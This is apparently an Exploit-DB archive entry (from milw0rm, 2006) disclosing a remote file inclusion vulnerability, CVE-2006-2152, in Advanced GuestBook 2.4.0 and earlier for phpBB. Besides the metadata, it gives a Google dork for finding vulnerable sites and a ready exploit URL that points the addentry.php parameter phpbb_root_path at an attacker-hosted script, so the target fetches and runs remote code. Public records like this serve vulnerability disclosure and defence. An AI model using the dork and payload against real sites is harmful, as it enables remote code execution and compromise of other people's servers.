Advanced GuestBook <= 2.4.0 - phpBB File Inclusion Vulnerability

2006-04-28T00:00:00
ID EDB-ID:1723
Type exploitdb
Reporter [Oo]
Modified 2006-04-28T00:00:00

Description

Advanced GuestBook <= 2.4.0 (phpBB) File Inclusion Vulnerability. CVE-2006-2152. Webapps exploit for php platform

                                        
                                            Title: Advanced GuestBook for phpBB &lt;= 2.4.0 Remote File Inclusion
Dork: inurl:guestbook.php "Advanced GuestBook" "powered by phpbb"
Credits: [Oo]

Exploit: http://[url]/[phpbb_path]/admin/addentry.php?phpbb_root_path=http://[badscript]?

# milw0rm.com [2006-04-28]